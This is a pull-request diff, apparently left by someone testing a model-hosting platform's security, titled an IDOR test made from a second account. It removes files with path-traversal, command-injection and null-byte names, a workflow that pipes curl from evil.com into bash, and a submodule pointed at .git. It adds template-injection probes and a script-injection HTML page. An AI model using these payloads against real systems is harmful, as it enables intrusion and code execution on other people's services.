PR IDOR test from Account2
#11
by SECONDACCOUNT69 - opened
This view is limited to 50 files because it contains too many changes. See the raw diff here.
- .git/config +0 -1
- $(id).txt +0 -1
- %252e%252e%252fetc%252fpasswd +0 -1
- %2e%2e/%2e%2e/etc/passwd +0 -1
- .env +0 -1
- .git/tconfig +0 -1
- .git//vconfig +0 -1
- .git%00/config +0 -1
- .gitattributes +34 -0
- .github/workflows/evil.yml +0 -7
- .gitmodules +0 -3
- .git~1/config +0 -1
- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt +0 -1
- README.md +19 -2
- __pycache__/exploit.py +0 -1
- `id`.txt +0 -1
- a.txt +0 -1
- a/b.txt +0 -1
- a/c.txt +0 -1
- aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.txt +0 -1
- bar.txt +0 -1
- c.txt +0 -1
- clean_redir.txt +0 -1
- con.txt +0 -1
- file/nname.txt +0 -1
- file%00name.txt +0 -1
- file%2500.txt +0 -1
- lfs-pointer-test.bin +0 -3
- lfs-test-proper.bin +0 -3
- link.txt +0 -1
- method_test.txt +0 -1
- method_test2.txt +0 -1
- node_modules/.cache/hack +0 -1
- normal.txt::$DATA +0 -1
- null-byte-test-cleanup.txt +0 -1
- nullbyte.txt +0 -1
- port_test.txt +0 -1
- pr-branch-push.txt +1 -0
- pr-idor-test.txt +1 -0
- pr-test.txt +0 -1
- public-test.txt +0 -1
- redirect_chain_test.txt +0 -1
- redirect_test.txt +0 -1
- redirect_test2.txt +0 -1
- search-test.md +0 -7
- symlink-test +0 -1
- test.html +1 -1
- test.svg +1 -0
- test|id.txt +0 -1
- webhook-trigger.txt +0 -1
.git/config
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test for leading space
|
|
|
|
|
|
$(id).txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
inline:0:test
|
|
|
|
|
|
%252e%252e%252fetc%252fpasswd
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
inline:0:test
|
|
|
|
|
|
%2e%2e/%2e%2e/etc/passwd
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
inline:0:test
|
|
|
|
|
|
.env
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test content
|
|
|
|
|
|
.git/tconfig
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test for tab in git path
|
|
|
|
|
|
.git//vconfig
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test for vtab in git path
|
|
|
|
|
|
.git%00/config
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test for pct-null in git path
|
|
|
|
|
|
.gitattributes
CHANGED
|
@@ -1 +1,35 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
*.safetensors filter=lfs diff=lfs merge=lfs -text
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
*.7z filter=lfs diff=lfs merge=lfs -text
|
| 2 |
+
*.arrow filter=lfs diff=lfs merge=lfs -text
|
| 3 |
+
*.bin filter=lfs diff=lfs merge=lfs -text
|
| 4 |
+
*.bz2 filter=lfs diff=lfs merge=lfs -text
|
| 5 |
+
*.ckpt filter=lfs diff=lfs merge=lfs -text
|
| 6 |
+
*.ftz filter=lfs diff=lfs merge=lfs -text
|
| 7 |
+
*.gz filter=lfs diff=lfs merge=lfs -text
|
| 8 |
+
*.h5 filter=lfs diff=lfs merge=lfs -text
|
| 9 |
+
*.joblib filter=lfs diff=lfs merge=lfs -text
|
| 10 |
+
*.lfs.* filter=lfs diff=lfs merge=lfs -text
|
| 11 |
+
*.mlmodel filter=lfs diff=lfs merge=lfs -text
|
| 12 |
+
*.model filter=lfs diff=lfs merge=lfs -text
|
| 13 |
+
*.msgpack filter=lfs diff=lfs merge=lfs -text
|
| 14 |
+
*.npy filter=lfs diff=lfs merge=lfs -text
|
| 15 |
+
*.npz filter=lfs diff=lfs merge=lfs -text
|
| 16 |
+
*.onnx filter=lfs diff=lfs merge=lfs -text
|
| 17 |
+
*.ot filter=lfs diff=lfs merge=lfs -text
|
| 18 |
+
*.parquet filter=lfs diff=lfs merge=lfs -text
|
| 19 |
+
*.pb filter=lfs diff=lfs merge=lfs -text
|
| 20 |
+
*.pickle filter=lfs diff=lfs merge=lfs -text
|
| 21 |
+
*.pkl filter=lfs diff=lfs merge=lfs -text
|
| 22 |
+
*.pt filter=lfs diff=lfs merge=lfs -text
|
| 23 |
+
*.pth filter=lfs diff=lfs merge=lfs -text
|
| 24 |
+
*.rar filter=lfs diff=lfs merge=lfs -text
|
| 25 |
*.safetensors filter=lfs diff=lfs merge=lfs -text
|
| 26 |
+
saved_model/**/* filter=lfs diff=lfs merge=lfs -text
|
| 27 |
+
*.tar.* filter=lfs diff=lfs merge=lfs -text
|
| 28 |
+
*.tar filter=lfs diff=lfs merge=lfs -text
|
| 29 |
+
*.tflite filter=lfs diff=lfs merge=lfs -text
|
| 30 |
+
*.tgz filter=lfs diff=lfs merge=lfs -text
|
| 31 |
+
*.wasm filter=lfs diff=lfs merge=lfs -text
|
| 32 |
+
*.xz filter=lfs diff=lfs merge=lfs -text
|
| 33 |
+
*.zip filter=lfs diff=lfs merge=lfs -text
|
| 34 |
+
*.zst filter=lfs diff=lfs merge=lfs -text
|
| 35 |
+
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
.github/workflows/evil.yml
DELETED
|
@@ -1,7 +0,0 @@
|
|
| 1 |
-
inline:0:name: evil
|
| 2 |
-
on: push
|
| 3 |
-
jobs:
|
| 4 |
-
evil:
|
| 5 |
-
runs-on: ubuntu-latest
|
| 6 |
-
steps:
|
| 7 |
-
- run: curl http://evil.com/shell.sh | bash
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
.gitmodules
DELETED
|
@@ -1,3 +0,0 @@
|
|
| 1 |
-
[submodule "evil"]
|
| 2 |
-
path = .git
|
| 3 |
-
url = https://example.com/evil.git
|
|
|
|
|
|
|
|
|
|
|
|
.git~1/config
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
shortname test
|
|
|
|
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
inline:0:test
|
|
|
|
|
|
README.md
CHANGED
|
@@ -1,5 +1,22 @@
|
|
| 1 |
---
|
| 2 |
license: mit
|
| 3 |
---
|
| 4 |
-
#
|
| 5 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
---
|
| 2 |
license: mit
|
| 3 |
---
|
| 4 |
+
# SSTI Test
|
| 5 |
+
|
| 6 |
+
{@html "<b>bold</b>"}
|
| 7 |
+
|
| 8 |
+
{2+2}
|
| 9 |
+
|
| 10 |
+
{process.env}
|
| 11 |
+
|
| 12 |
+
${7*7}
|
| 13 |
+
|
| 14 |
+
{{7*7}}
|
| 15 |
+
|
| 16 |
+
<%= 7*7 %>
|
| 17 |
+
|
| 18 |
+
#{7*7}
|
| 19 |
+
|
| 20 |
+
${{7*7}}
|
| 21 |
+
|
| 22 |
+
{#if true}visible{/if}
|
__pycache__/exploit.py
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test content
|
|
|
|
|
|
`id`.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
inline:0:test
|
|
|
|
|
|
a.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test for 3x up from 3 deep = root level
|
|
|
|
|
|
a/b.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test for many slashes
|
|
|
|
|
|
a/c.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
within_test
|
|
|
|
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test
|
|
|
|
|
|
bar.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
normalized_test
|
|
|
|
|
|
c.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
normalized_test2
|
|
|
|
|
|
clean_redir.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test 1778466942
|
|
|
|
|
|
con.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test
|
|
|
|
|
|
file/nname.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test
|
|
|
|
|
|
file%00name.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test
|
|
|
|
|
|
file%2500.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
inline:0:test
|
|
|
|
|
|
lfs-pointer-test.bin
DELETED
|
@@ -1,3 +0,0 @@
|
|
| 1 |
-
inline:0:version https://git-lfs.github.com/spec/v1
|
| 2 |
-
oid sha256:4d7a214614ab2935c943f9e0ff69d22eadbb8f32b1258daaa5e2ca24d17e2393
|
| 3 |
-
size 12345
|
|
|
|
|
|
|
|
|
|
|
|
lfs-test-proper.bin
DELETED
|
@@ -1,3 +0,0 @@
|
|
| 1 |
-
inline:0:version https://git-lfs.github.com/spec/v1
|
| 2 |
-
oid sha256:4d7a214614ab2935c943f9e0ff69d22eadbb8f32b1258daaa5e2ca24d17e2393
|
| 3 |
-
size 12345
|
|
|
|
|
|
|
|
|
|
|
|
link.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
../../../etc/passwd
|
|
|
|
|
|
method_test.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test 1778466738
|
|
|
|
|
|
method_test2.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test 1778467055
|
|
|
|
|
|
node_modules/.cache/hack
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test content
|
|
|
|
|
|
normal.txt::$DATA
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
ads test
|
|
|
|
|
|
null-byte-test-cleanup.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test content
|
|
|
|
|
|
nullbyte.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
null test
|
|
|
|
|
|
port_test.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test 1778467241
|
|
|
|
|
|
pr-branch-push.txt
ADDED
|
@@ -0,0 +1 @@
|
|
|
|
|
|
|
| 1 |
+
pushed to PR branch
|
pr-idor-test.txt
ADDED
|
@@ -0,0 +1 @@
|
|
|
|
|
|
|
| 1 |
+
This PR was created by Account2 on Account1 repo
|
pr-test.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
pr test content
|
|
|
|
|
|
public-test.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
Public trigger
|
|
|
|
|
|
redirect_chain_test.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test 1778466487
|
|
|
|
|
|
redirect_test.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
redirect test 1778465976
|
|
|
|
|
|
redirect_test2.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
test 1778466302
|
|
|
|
|
|
search-test.md
DELETED
|
@@ -1,7 +0,0 @@
|
|
| 1 |
-
---
|
| 2 |
-
tags:
|
| 3 |
-
- PUBLICSEARCHTOKEN99887766
|
| 4 |
-
---
|
| 5 |
-
# Public Test Model
|
| 6 |
-
|
| 7 |
-
This model contains PUBLICSEARCHTOKEN99887766 unique identifier for search testing.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
symlink-test
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
inline:0:/etc/passwd
|
|
|
|
|
|
test.html
CHANGED
|
@@ -1 +1 @@
|
|
| 1 |
-
<html><
|
|
|
|
| 1 |
+
<html><body><script>document.write(document.domain)</script></body></html>
|
test.svg
ADDED
|
|
test|id.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
inline:0:test
|
|
|
|
|
|
webhook-trigger.txt
DELETED
|
@@ -1 +0,0 @@
|
|
| 1 |
-
trigger
|
|
|
|
|
|